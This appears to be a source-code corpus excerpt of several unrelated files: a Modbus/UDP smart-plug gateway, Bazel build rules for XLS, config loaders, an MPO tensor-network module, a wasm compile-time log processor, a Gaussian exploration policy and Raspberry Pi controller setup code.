parser.add_argument("--port", help="port number to listen on", default=DEFAULT_MODBUS_PORT)
args = parser.parse_args()
ipaddr = args.ipaddr
port = int(args.port)
print("====== {} === HS100/110 IP address: {} === Modbus Port: {} ======".format(progname, ipaddr, port))
# Listen for Modbus/UDP requests on all interfaces.
udp = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
udp.bind(('', port))
while True:
    print("Waiting to receive incoming Modbus packet over UDP")
    try:
        databytes, clientaddress = udp.recvfrom(MAX_PACKET_LENGTH)
    except ConnectionResetError:
        # Raised (notably on Windows) for ICMP port-unreachable on UDP.
        print("{}: got a ConnectionResetError - ignoring".format(progname), file=sys.stderr)
        continue
    # MBAP header is 6 bytes: transaction id (2), protocol id (2), length (2).
    if len(databytes) < 6:
        print("{}: runt Modbus UDP packet received - ignoring".format(progname), file=sys.stderr)
        showpacket(databytes)
        continue
    packetlength = (databytes[4] * 256) + databytes[5]
    if (packetlength < 2):
        print("{}: Modbus UDP packet length too short to have any useful data in it - ignoring".format(progname), file=sys.stderr)
        showpacket(databytes)
        continue
    # The length field counts everything after the 6-byte MBAP header.
    if (packetlength + 6) != len(databytes):
        print("{}: Modbus UDP packet has incorrect length - ignoring".format(progname), file=sys.stderr)
        showpacket(databytes)
        continue
    unitid = databytes[6]
    if unitid != 1:
        print("{}: this gateway only serves Modbus UDP packets with Unit ID of 1 - ignoring".format(progname), file=sys.stderr)
        showpacket(databytes)
        continue
    functioncode = databytes[7]
    if functioncode == 1:
        # read coil
        print("Function code 0x01 - read single coil")
        showpacket(databytes)
        if packetlength != 6:
            print("{}: incorrect packet length for function code 0x01 - ignoring".format(progname), file=sys.stderr)
            continue
        addr = (databytes[8] * 256) + databytes[9]
        if (addr != 0):
            print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
            continue
        numr = (databytes[10] * 256) + databytes[11]
        if (numr != 1):
            print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
            continue
        # Coil 0 is mapped onto the plug's relay state.
        relay = getrelaystatus(ipaddr)
        # Response: echoed transaction/protocol id, length=4, then
        # unit id, function code, byte count, coil data.
        response = bytearray(6 + 4)
        response[0:3] = databytes[0:3]
        response[4] = 0
        response[5] = 4
        response[6] = 1
        response[7] = 1
        response[8] = 1
        response[9] = relay
        print("Sending response:")
        showpacket(response)
        udp.sendto(response, clientaddress)
        continue
    if functioncode == 5:
        # write coil
        print("Function code 0x05 - write single coil")
        showpacket(databytes)
        if packetlength != 6:
            # NOTE(review): message says 0x06 but this branch handles 0x05.
            print("{}: incorrect packet length for function code 0x06 - ignoring".format(progname), file=sys.stderr)
            showpacket(databytes)
            continue
        addr = (databytes[8] * 256) + databytes[9]
        if (addr != 0):
            print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
            continue
        stat = (databytes[10] * 256) + databytes[11]
        # Modbus "write single coil": 0x0000 = off, 0xFF00 = on.
        if ((stat != 0) and (stat != 0xFF00)):
            print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
            continue
        setrelaystatus(ipaddr, stat)
        # The write-coil response simply echoes the request.
        response = bytearray(len(databytes))
        response[0:12] = databytes[0:12]
        print("Sending response:")
        showpacket(response)
        udp.sendto(response, clientaddress)
        continue
    print("{}: unrecognised or unsupported packet".format(progname), file=sys.stderr)
    showpacket(databytes)
########################################################################
# end of file
| 2.140625 | 2 |
xls/build_rules/dslx_test.bzl | ufo2011/xls | 0 | 12760992 | <reponame>ufo2011/xls
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""See dslx_test()."""
load("//xls/build_rules:genrule_wrapper.bzl", "genrule_wrapper")
load("//xls/build_rules:dslx_codegen.bzl", "make_benchmark_args")
_INTERPRETER_MAIN = "//xls/dslx:interpreter_main"
_DSLX_TEST = "//xls/dslx/interpreter:dslx_test"
# TODO(meheff): Move this to a different internal-only bzl file.
def _convert_ir(
        name,
        src,
        entry,
        srcs,
        deps,
        tags,
        args,
        prove_unopt_eq_opt,
        generate_benchmark,
        kwargs):
    """Instantiates IR conversion/optimization targets for one DSLX source.

    Creates (all prefixed with `name`): an IR-converter smoke test, genrules
    producing unoptimized (`name`.ir) and optimized (`name`.opt.ir) IR, an
    `_all_ir` filegroup, and optionally an opt-vs-unopt equivalence test and
    benchmark targets.
    """
    # Run the IR converter itself as a test so conversion failures surface.
    native.sh_test(
        name = name + "_ir_converter_test",
        srcs = ["//xls/dslx:ir_converter_test_sh"],
        args = [native.package_name() + "/" + src] + args,
        data = [
            "//xls/dslx:ir_converter_main",
        ] + srcs + deps,
        tags = tags,
    )
    # Unoptimized IR.
    genrule_wrapper(
        name = name + "_ir",
        srcs = srcs + deps,
        outs = [name + ".ir"],
        cmd = "$(location //xls/dslx:ir_converter_main) --dslx_path=$(GENDIR) $(SRCS) > $@",
        exec_tools = ["//xls/dslx:ir_converter_main"],
        tags = tags,
        **kwargs
    )
    # Optimized IR: convert, then pipe through opt_main.
    genrule_wrapper(
        name = name + "_opt_ir",
        srcs = srcs + deps,
        outs = [name + ".opt.ir"],
        cmd = ("$(location //xls/dslx:ir_converter_main) --dslx_path=$(GENDIR) $(SRCS) " +
               " | $(location //xls/tools:opt_main) --entry=%s - " +
               " > $@") % (entry or ""),
        exec_tools = [
            "//xls/dslx:ir_converter_main",
            "//xls/tools:opt_main",
        ],
        tags = tags,
        **kwargs
    )
    native.filegroup(
        name = name + "_all_ir",
        srcs = [name + ".opt.ir", name + ".ir"],
    )
    if prove_unopt_eq_opt:
        # Formally check that optimized and unoptimized IR are equivalent.
        native.sh_test(
            name = name + "_opt_equivalence_test",
            srcs = ["//xls/tools:check_ir_equivalence_sh"],
            args = [
                native.package_name() + "/" + name + ".ir",
                native.package_name() + "/" + name + ".opt.ir",
            ] + (["--function=" + entry] if entry else []),
            size = "large",
            data = [
                ":" + name + "_all_ir",
                "//xls/tools:check_ir_equivalence_main",
            ],
            tags = tags + ["optonly"],
        )
    if generate_benchmark:
        benchmark_args = make_benchmark_args(
            native.package_name(),
            name,
            entry,
            args,
        )
        # Add test which executes benchmark_main on the IR.
        native.sh_test(
            name = name + "_benchmark_test",
            srcs = ["//xls/tools:benchmark_test_sh"],
            args = benchmark_args,
            data = [
                "//xls/tools:benchmark_main",
                ":" + name + "_all_ir",
            ],
            tags = tags,
        )
        # Add test which evaluates the IR with the interpreter and verifies
        # the result before and after optimizations match.
        native.sh_test(
            name = name + "_benchmark_eval_test",
            srcs = ["//xls/tools:benchmark_eval_test_sh"],
            args = benchmark_args + ["--random_inputs=100", "--optimize_ir"],
            data = [
                "//xls/tools:eval_ir_main",
                ":" + name + "_all_ir",
            ],
            tags = tags + ["optonly"],
        )
# TODO(meheff): dslx_test includes a bunch of XLS internal specific stuff such
# as generating benchmarks and convert IR. These should be factored out so we
# have a clean macro for end-user use.
def dslx_test(
        name,
        srcs,
        deps = None,
        entry = None,
        args = None,
        convert_ir = True,
        compare = "jit",
        prove_unopt_eq_opt = True,
        generate_benchmark = True,
        tags = [],
        **kwargs):
    """Runs all test cases inside of a DSLX source file as a test target.

    Args:
      name: 'Base' name for the targets that get created.
      srcs: '.x' file sources.
      deps: Dependent '.x' file sources.
      entry: Name (currently *mangled* name) of the entry point that should be
        converted / code generated.
      args: Additional arguments to pass to the DSLX interpreter and IR
        converter.
      convert_ir: Whether or not to convert the DSLX code to IR.
      compare: Perform a runtime equivalence check between the DSLX interpreter
        and the IR JIT ('jit') or IR interpreter ('interpreter') or no IR
        conversion / comparison at all ('none').
      generate_benchmark: Whether or not to create a benchmark target (that
        analyses XLS scheduled critical path).
      prove_unopt_eq_opt: Whether or not to generate a test to compare semantics
        of opt vs. non-opt IR. Only enabled if convert_ir is true.
      tags: Tags to place on all generated targets.
      **kwargs: Extra arguments to pass to genrule.
    """
    args = args or []
    deps = deps or []
    if len(srcs) != 1:
        fail("More than one source not currently supported.")

    # Bug fix: the original guard was `entry and not type(entry) != str`,
    # which simplifies to `type(entry) == str` -- i.e. it failed precisely
    # when a *valid* string entry was supplied and accepted non-strings.
    if entry and type(entry) != str:
        fail("Entry argument must be a string.")
    src = srcs[0]
    interpreter_args = ["--compare={}".format(compare if convert_ir else "none")]
    # Run the DSLX interpreter over the file's inline test cases.
    native.sh_test(
        name = name + "_dslx_test",
        srcs = [_DSLX_TEST],
        args = [native.package_name() + "/" + src] + args + interpreter_args,
        data = [
            _INTERPRETER_MAIN,
        ] + srcs + deps,
        tags = tags,
    )
    if convert_ir:
        _convert_ir(
            name,
            src,
            entry,
            srcs,
            deps,
            tags,
            args,
            prove_unopt_eq_opt,
            generate_benchmark,
            kwargs,
        )
    native.filegroup(
        name = name + "_source",
        srcs = srcs,
    )
    native.test_suite(
        name = name,
        tests = [name + "_dslx_test"],
        tags = tags,
    )
| 1.679688 | 2 |
openslides/utils/auth/__init__.py | DebVortex/OpenSlides | 0 | 12760993 | <reponame>DebVortex/OpenSlides<gh_stars>0
from .AnonymousAuth import * # noqa
| 1.039063 | 1 |
common/config.py | weng-lab/SCREEN | 5 | 12760994
#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
# Copyright (c) 2016-2020 <NAME>, <NAME>, <NAME>, <NAME>
import sys
import os
import json
class Config:
    """Class-level settings loaded once, at import time, from config.json."""
    # Path to the active config; config.json is expected to be a symlink to
    # one of the config.<env>.json variants.
    fnp = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../config.json")
    if not os.path.exists(fnp):
        print("ERROR: file not found:", fnp)
        print("\tfile should be symlink'd to a desired config.<blah>.json file")
        # NOTE(review): terminates the whole process at import time when the
        # config file is missing.
        sys.exit(1)
    with open(fnp) as f:
        c = json.load(f)
    # Everything below comes from the "RE" section and is exposed as a class
    # attribute (e.g. Config.db_host).  `re` here is a dict, not the module.
    re = c["RE"]
    partial_assemblies = re["partial_assemblies"] if "partial_assemblies" in re else []
    version = re["version"]
    db_host = re["db_host"]
    db_usr = re["db_usr"]
    db_port = re["db_port"]
    db = re["db"]
    assemblies = re["assemblies"]
    minipeaks_ver = re["minipeaks_ver"]
    minipeaks_nbins = re["minipeaks_nbins"]
    ribbon = re["ribbon"]
    GoogleAnalytics = re["googleAnalytics"]
    memcache = re["memcache"]
    cassandra = re["cassandra"]
    redisHost = re["redisHost"]
    bedupload = c["bedupload"]
    downloadDir = re["downloadDir"]
    rnaSeqIsNorm = re["rnaSeqIsNorm"]
    #peakIntersectionRunDate = re["peakIntersectionRunDate"]
    #cistromePeakIntersectionRunDate = re["cistromePeakIntersectionRunDate"]
| 2.125 | 2 |
settings/detector_configuration_settings.py | bopopescu/Lauecollect | 0 | 12760995
show_in_list = True
title = 'Detector Configuration'
motor_names = ['collect.detector_configuration', 'xray_scope.setup', 'laser_scope.setup']
names = ['detectors', 'xray_scope_setup', 'laser_scope_setup', 'motor2']
motor_labels = ['Detectors', 'X-ray Scope Setup', 'Laser Scope Setup']
widths = [280, 170, 170]
line0.xray_scope.setup = 'NIH SAXS-WAXS'
line0.laser_scope.setup = 'NIH SAXS-WAXS'
line0.updated = '2019-05-28 20:24:36'
line1.xray_scope.setup = 'NIH FPGA diagnostics'
line1.laser_scope.setup = 'FPGA diagnostics'
line1.updated = '2019-01-28 18:17:10'
line0.description = 'SAXS/WAXS'
line1.description = 'FPGA diagnostics'
command_rows = [0]
line0.detectors = 'xray_detector, xray_scope, laser_scope'
line0.collect.detector_configuration = 'xray_detector, xray_scope, laser_scope'
nrows = 9
line2.description = 'SAXS/WAXS static'
line2.collect.detector_configuration = 'xray_detector, xray_scope'
line2.xray_scope.setup = 'NIH SAXS-WAXS'
line2.laser_scope.setup = ''
line2.updated = '2019-05-28 19:49:55'
line3.description = 'NIH:Channel-Cut-Scan'
line3.collect.detector_configuration = 'xray_scope'
line3.updated = '2019-01-28 18:16:58'
line3.xray_scope.setup = 'NIH Channel Cut Scan'
line4.description = 'NIH:Slit-Scan'
line4.collect.detector_configuration = 'xray_scope'
line4.updated = '2019-03-18 17:06:12'
line4.xray_scope.setup = 'NIH Slit Scan'
line5.description = 'X-Ray Alignment'
line5.collect.detector_configuration = ''
line5.updated = '2019-01-29 08:48:16'
line5.xray_scope.setup = 'Alignment'
line5.laser_scope.setup = ''
row_height = 20
line6.xray_scope.setup = 'APS Channel Cut Scan'
line6.updated = '2019-01-29 17:04:44'
line6.description = 'APS:Channel-Cut-Scan'
description_width = 180
line7.description = 'NIH:X-Ray Beam Check'
line7.collect.detector_configuration = 'xray_scope'
line7.updated = '2019-01-29 22:55:00'
line7.xray_scope.setup = 'NIH X-Ray Beam Check'
line8.collect.detector_configuration = 'xray_detector'
line8.updated = '2019-02-04 11:50:52'
line8.xray_scope.setup = '<NAME>'
line8.laser_scope.setup = ''
line8.description = '<NAME>' | 1.101563 | 1 |
examples/matrix_blink.py | sonntagsgesicht/flotilla-python | 22 | 12760996 | <reponame>sonntagsgesicht/flotilla-python
#!/usr/bin/env python
import sys
import time
import flotilla
print("""
This example will iterate through all connected Flotilla modules,
find each Matrix, and blink one of the pixels.
Press CTRL+C to exit.
""")

# Connect to the dock and busy-wait until it reports ready.
dock = flotilla.Client()
print("Client connected...")
while not dock.ready:
    pass

print("Finding modules...")
matrix = dock.first(flotilla.Matrix)
if matrix is None:
    print("no Matrix module found...")
    dock.stop()
    sys.exit(1)
print("Found. Running...")

# Toggle pixel (3, 3) on every attached Matrix once per second.
pixel_on = True
try:
    while True:
        for module in dock.available.values():
            if module.is_a(flotilla.Matrix):
                module.set_pixel(3, 3, pixel_on).update()
        pixel_on = not pixel_on
        time.sleep(1)
except KeyboardInterrupt:
    print("Stopping Flotilla...")
    dock.stop()
| 3.203125 | 3 |
tools/process-wasm-compilation-times.py | EXHades/v8 | 20,995 | 12760997 | <filename>tools/process-wasm-compilation-times.py<gh_stars>1000+
#!/usr/bin/env python3
# Copyright 2021 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Processes {stdout} output generated by --trace-wasm-compilation-times
# for easier consumption by human readers.
import sys
def SizeInternal(number, suffix):
  """Format a value: no suffix -> plain integer; with a suffix, keep one
  decimal place while the value is below 10."""
  if suffix == "":
    return "%d" % number
  fmt = "%.1f%s" if number < 10 else "%d%s"
  return fmt % (number, suffix)

def Size(number):
  """Render a byte count with a binary-prefix suffix (K/M/G/T)."""
  for suffix in ("", "K", "M", "G"):
    if number < 1024:
      return SizeInternal(number, suffix)
    number /= 1024
  return SizeInternal(number, "T")
# Bookkeeping for mapping raw module ids to compact display indices, plus
# running totals over all TurboFan-compiled functions.
modules = {}
max_module = 0
total_tf_time = 0
total_tf_size = 0

def RegisterName(raw):
  """Assign the module part of `raw` ("module#index") a sequential id."""
  global max_module
  module_id = raw.split("#")[0]
  if module_id not in modules:
    modules[module_id] = max_module
    max_module += 1

def Name(raw):
  """Render "module#index" compactly; omit the module when only one exists."""
  parts = raw.split("#")
  if len(modules) == 1:
    return "#%s" % parts[1]
  return "m%d#%s" % (modules[parts[0]], parts[1])
class Function:
  """Per-function record accumulated from Liftoff and TurboFan trace lines."""
  def __init__(self, index):
    self.index = index          # e.g. "module#6"
    self.has_lo = False         # saw a Liftoff line for this function
    self.has_tf = False         # saw a TurboFan line for this function
    self.time_lo = -1           # Liftoff compile time (ms)
    self.time_tf = -1           # TurboFan compile time (ms)
    self.mem_lo = -1            # Liftoff memory (bytes)
    self.mem_tf_max = -1        # TurboFan max memory (bytes)
    self.mem_tf_total = -1      # TurboFan total memory (bytes)
    self.name = ""              # name from the TurboFan line
    self.size_wasm = -1         # wasm body size (bytes), from Liftoff line
    self.size_lo = -1           # Liftoff code size (bytes)
    self.size_tf = -1           # TurboFan code size (bytes)
  def AddLine(self, words):
    """Dispatch a pre-split trace line to the matching compiler parser."""
    assert self.index == words[2], "wrong function"
    if words[4] == "TurboFan,":
      self.AddTFLine(words)
    elif words[4] == "Liftoff,":
      self.AddLiftoffLine(words)
    else:
      raise Exception("unknown compiler: %s" % words[4])
  def AddTFLine(self, words):
    """Parse a TurboFan line (field positions documented below)."""
    assert not self.has_tf, "duplicate TF line for %s" % self.index
    self.has_tf = True
    # 0        1        2  3     4         5    6 7  8   9     10 11
    # Compiled function #6 using TurboFan, took 0 ms and 14440 / 44656
    # 12        13     14       15 16   17
    # max/total bytes, codesize 24 name wasm-function#6
    self.time_tf = int(words[6])
    self.mem_tf_max = int(words[9])
    self.mem_tf_total = int(words[11])
    self.size_tf = int(words[15])
    self.name = words[17]
  def AddLiftoffLine(self, words):
    """Parse a Liftoff line (field positions documented below)."""
    assert self.index == words[2], "wrong function"
    assert not self.has_lo, "duplicate Liftoff line for %s" % self.index
    self.has_lo = True
    # 0        1        2  3     4        5    6 7  8   9   10     11       12
    # Compiled function #6 using Liftoff, took 0 ms and 968 bytes; bodysize 4
    # 13       14
    # codesize 68
    self.time_lo = int(words[6])
    self.mem_lo = int(words[9])
    self.size_lo = int(words[14])
    self.size_wasm = int(words[12])
  def __str__(self):
    # One human-readable summary row per function.
    return "%s: time %d %d mem %s %s %s size %s %s %s name %s" % (
        Name(self.index), self.time_lo, self.time_tf,
        Size(self.mem_lo), Size(self.mem_tf_max), Size(self.mem_tf_total),
        Size(self.size_wasm), Size(self.size_lo), Size(self.size_tf), self.name
    )
# index string -> Function, plus an insertion-ordered list for reporting.
funcs_dict = {}
funcs_list = []
if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help", "help"):
  print("Pass output file (generated with --trace-wasm-compilation-times) as "
        "argument")
  sys.exit(1)
with open(sys.argv[1], "r") as f:
  for line in f.readlines():
    words = line.strip().split(" ")
    # Only "Compiled function #N using ..." trace lines are interesting.
    if words[0] != "Compiled": continue
    name = words[2]
    RegisterName(name)
    if name in funcs_dict:
      func = funcs_dict[name]
    else:
      func = Function(name)
      funcs_dict[name] = func
      funcs_list.append(func)
    func.AddLine(words)
# Report functions sorted by TurboFan compile time (ascending), then totals.
funcs_list.sort(key=lambda fun: fun.time_tf)
for f in funcs_list:
  print(f)
  total_tf_time += f.time_tf
  total_tf_size += f.size_tf
print("Total TF time: %d" % total_tf_time)
print("Total TF size: %d" % total_tf_size)
| 2.109375 | 2 |
vmps/mpo.py | Lynn-015/Test_01 | 2 | 12760998 | <gh_stars>1-10
import numpy as np
from copy import deepcopy
from mps import MPS
class MPO(object):
    """Matrix product operator: a chain of rank-4 tensors Ws[l] with index
    order (left bond, physical out, physical in, right bond)."""

    def __init__(self, d, L, Ws=None):
        # Fix: the original used a mutable default (Ws=[]) shared across
        # instances; None-sentinel keeps the interface backward compatible.
        self.Ws = [] if Ws is None else Ws
        self.d = d
        self.D = self.d ** 2
        self.L = L

    def compress(self, m):
        """Truncate every bond dimension to at most m via a left-to-right
        SVD sweep, keeping the m largest singular values at each bond.

        Fixes over the original: np.linalg.svd (np.svd does not exist), the
        pre-SVD reshape is actually applied, U/S/Vdag are truncated
        consistently (the original truncated S alone, which kept the
        *smallest* values after S.sort() and caused shape mismatches), and
        the final carry-over matrix is absorbed so no weight is lost.
        """
        o = np.array([[1.]])  # carry-over matrix absorbed into the next site
        for l in range(self.L):
            W = np.tensordot(o, self.Ws[l], axes=1)
            a, dout, din, b = W.shape
            U, S, Vdag = np.linalg.svd(W.reshape(a * dout * din, b),
                                       full_matrices=False)
            k = min(m, S.shape[0])  # keep the k largest (svd sorts descending)
            self.Ws[l] = U[:, :k].reshape(a, dout, din, k)
            o = np.tensordot(np.diag(S[:k]), Vdag[:k, :], axes=1)
        # Absorb the remaining (1x1) carry-over into the last tensor.
        self.Ws[-1] = np.tensordot(self.Ws[-1], o, axes=1)
def op2mpo(op, d, L):
    """Decompose a dense d**L x d**L operator matrix into an MPO by
    splitting off one site per SVD iteration.

    Fix: the transpose/reshape that interleaves the row and column physical
    indices was computed but *discarded* in the original, so the SVD ran on
    the wrong (still 5-dimensional) array.
    """
    o = deepcopy(op)
    a = 1  # current left bond dimension
    Ws = []
    for i in range(L):
        rest = d ** (L - i - 1)
        O = o.reshape((a, d, rest, d, rest))
        # Group (bond, row_i, col_i) as matrix rows, remaining sites as cols.
        O = O.transpose((0, 1, 3, 2, 4)).reshape(a * d * d, rest * rest)
        U, S, Vdag = np.linalg.svd(O, full_matrices=False)
        Ws.append(U.reshape(-1, d, d, U.shape[-1]))
        o = np.tensordot(np.diag(S), Vdag, axes=1)
        a = S.shape[0]
    # o is now a 1x1 matrix holding the residual scalar weight.
    Ws[-1] *= float(o[0, 0])
    return MPO(d, L, Ws)
def add(mpo1, mpo2):
    """Return the MPO sum mpo1 + mpo2 (direct sum on the virtual bonds).

    Fixes over the original: W was never allocated (NameError), np.hstack /
    np.vstack were called with two positional arguments instead of a tuple,
    and block_diag was undefined.  Each summed tensor is built explicitly.
    """
    d, L = mpo1.d, mpo1.L
    Ws = []
    for l in range(L):
        W1, W2 = mpo1.Ws[l], mpo2.Ws[l]
        if l == 0:
            # Row vector of blocks: concatenate along the right bond.
            W = np.zeros((W1.shape[0], d, d, W1.shape[3] + W2.shape[3]))
            W[:, :, :, :W1.shape[3]] = W1
            W[:, :, :, W1.shape[3]:] = W2
        elif l == L - 1:
            # Column vector of blocks: concatenate along the left bond.
            W = np.zeros((W1.shape[0] + W2.shape[0], d, d, W1.shape[3]))
            W[:W1.shape[0]] = W1
            W[W1.shape[0]:] = W2
        else:
            # Interior sites: block-diagonal in both virtual bonds.
            W = np.zeros((W1.shape[0] + W2.shape[0], d, d,
                          W1.shape[3] + W2.shape[3]))
            W[:W1.shape[0], :, :, :W1.shape[3]] = W1
            W[W1.shape[0]:, :, :, W1.shape[3]:] = W2
        Ws.append(W)
    return MPO(d, L, Ws)
'''
def act(mpo,mps):
Ns=[]
tmps=deepcopy(mps) #target mps
tmps.contract_s() #contract S to A or B
for i in range(mpo.L):
N=contract(mpo.Ws[i],tmps.Ms[i],axes=([2,],[1,])) #details later
N.transpose((0,3,1,2)).reshape(N.shape[0]*N.shape[1],mpo.d,-1)
Ns.append(N)
rmps.Ms=Ns #result mps
return rmps
'''
| 2 | 2 |
code/Solutions TP2/racine.py | christophesaintjean/IntroProgS1_2020 | 0 | 12760999 | <filename>code/Solutions TP2/racine.py
import math
# Read a number and print its square root, refusing negative input.
x = float(input("x ? "))
if x < 0:
    print(f"Impossible de calculer la racine carrée de {x} qui est négatif")
else:
    rac_x = math.sqrt(x)
    print(f"La racine carrée de {x} est {rac_x}")
caql/gaussian_noise_policy.py | xxdreck/google-research | 2 | 12761000
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian noise policy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from caql import policy
class GaussianNoisePolicy(policy.BasePolicy):
  """Gaussian exploration: greedy action plus decaying Gaussian noise."""

  def __init__(self, greedy_policy, sigma, sigma_decay, sigma_min):
    """Creates a gaussian noise policy.

    Args:
      greedy_policy: policy.BasePolicy. The policy that is used to compute a
        greedy action.
      sigma: float. Standard deviation for a gaussian distribution.
      sigma_decay: float. Decay rate for the sigma.
      sigma_min: float. The minimum value of the sigma.
    """
    if not 0 <= sigma <= 1.0:
      raise ValueError('sigma should be in [0.0, 1.0]')
    self._greedy_policy = greedy_policy
    self._sigma = sigma
    self._sigma_decay = sigma_decay
    self._sigma_min = sigma_min

  @property
  def sigma(self):
    return self._sigma

  def _action(self, state, use_action_function, batch_mode=False):
    greedy = self._greedy_policy.action(state, use_action_function, batch_mode)
    if greedy is None:
      return None
    # Scale unit-normal noise by sigma and by the action-space magnitude so
    # the perturbation matches the scale of the action values.
    noise = (self._sigma * self._greedy_policy.action_spec.maximum *
             np.random.randn(*np.shape(greedy)))
    return greedy + noise

  def _update_params(self):
    # Decay sigma geometrically, but never below the configured floor.
    self._sigma = max(self._sigma * self._sigma_decay, self._sigma_min)

  def _params_debug_str(self):
    return 'sigma: %.3f' % self._sigma
| 2.734375 | 3 |
Blueberry.Server.Python/Main.py | ppedro74/BlueberryServer | 0 | 12761001 | <gh_stars>0
"""
Copyright (c) 2019 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
import sys
import time
import socket
import logging
import argparse
import Controller
import DigitalController
import PWMController
import ServoController
import SerialPortController
import ComponentRegistry
import EZBTcpServer
import EZBCameraServer
def setup_i2c():
    """Create the platform-appropriate I2C controller, register it under the
    name "i2c", start it, and return it."""
    if sys.platform in ("linux", "linux2"):
        import DeviceI2CController
        com = DeviceI2CController.DeviceI2CController(1, logging.DEBUG)
    else:
        # Non-Linux hosts get a stand-in controller for development.
        import FakeI2CController
        com = FakeI2CController.FakeI2CController(logging.DEBUG)
    ComponentRegistry.ComponentRegistry.register_component("i2c", com)
    ComponentRegistry.ComponentRegistry.register_controller(com)
    com.start()
    return com
def setup_digital_ports():
    """Create, register and start the platform-appropriate digital I/O
    controller and register its digital ports ("D0", "D1", ...).

    On Linux the Raspberry Pi GPIO controller is used with a subset of the
    free BCM pins; elsewhere a fake controller exposes 24 ports D0..D23.
    """
    # sys.platform is "linux2" on Python 2 and "linux" on Python 3.3+;
    # startswith() covers both (recommended by the sys.platform docs).
    if sys.platform.startswith("linux"):
        import RpiGPIODigitalController
        com = RpiGPIODigitalController.RpiGPIODigitalController(logging.DEBUG)
        ComponentRegistry.ComponentRegistry.register_controller(com)
        #+-----+---------+--B Plus--+-----------+-----+
        #| BCM | Name    | Physical | Name      | BCM |
        #+-----+---------+----++----+-----------+-----+
        #|     | 3.3v    |  1 ||  2 | 5v        |     |
        #|   2 | SDA.1   |  3 ||  4 | 5v        |     |
        #|   3 | SCL.1   |  5 ||  6 | GND       |     |
        #|   4 |         |  7 ||  8 | TxD       | 14  |
        #|     | GND     |  9 || 10 | RxD       | 15  |
        #|  17 | CE1.1   | 11 || 12 | CE0.1/BCLK| 18  |
        #|  27 |         | 13 || 14 | GND       |     |
        #|  22 |         | 15 || 16 |           | 23  |
        #|     | 3.3v    | 17 || 18 |           | 24  |
        #|  10 | MO.0    | 19 || 20 | GND       |     |
        #|   9 | MI.0    | 21 || 22 |           | 25  |
        #|  11 | CLK.0   | 23 || 24 | CE0.0     | 8   |
        #|     | GND     | 25 || 26 | CE1.0     | 7   |
        #|   0 | SDA.0   | 27 || 28 | SCL.0     | 1   |
        #|   5 |         | 29 || 30 | GND       |     |
        #|   6 |         | 31 || 32 |           | 12  |
        #|  13 |         | 33 || 34 | GND       |     |
        #|  19 |LRCK/MI.1| 35 || 36 | CE2.1     | 16  |
        #|  26 |         | 37 || 38 | MO.1/SDI  | 20  |
        #|     | GND     | 39 || 40 | CLK.1/SDO | 21  |
        #+-----+---------+----++----+-----------+-----+
        #| BCM | Name    | Physical | Name      | BCM |
        #+-----+---------+--B Plus--+-----------+-----+
        # Generic pins named after their BCM number
        # (excluded: uart, i2c, spi, i2s):
        for bcm in (4, 5, 6, 12, 13, 22, 23):
            ComponentRegistry.ComponentRegistry.register_component("D" + str(bcm), DigitalController.DigitalPort(com, bcm))
        # Remapped pins: logical ports D0..D3 map to BCM 24..27.
        for port, bcm in enumerate((24, 25, 26, 27)):
            ComponentRegistry.ComponentRegistry.register_component("D" + str(port), DigitalController.DigitalPort(com, bcm))
        com.start()
    else:
        import FakeDigitalController
        com = FakeDigitalController.FakeDigitalController(logging.DEBUG)
        ComponentRegistry.ComponentRegistry.register_controller(com)
        for port in range(24):
            ComponentRegistry.ComponentRegistry.register_component("D" + str(port), DigitalController.DigitalPort(com, port))
        com.start()
def setup_i2c_PCA9685Controller(i2c_com, freq=490):
    """Register a PCA9685 over I2C as a plain 16-channel PWM controller,
    exposing its channels as components "P0".."P15" at *freq* Hz."""
    import PCA9685Controller
    registry = ComponentRegistry.ComponentRegistry
    controller = PCA9685Controller.PCA9685Controller(i2c_com, logging.DEBUG)
    registry.register_controller(controller)
    for channel in range(16):
        registry.register_component("P" + str(channel), PWMController.PWMPort(controller, channel))
    controller.start()
    controller.frequency = freq
def setup_i2c_PCA9685ServoController(i2c_com):
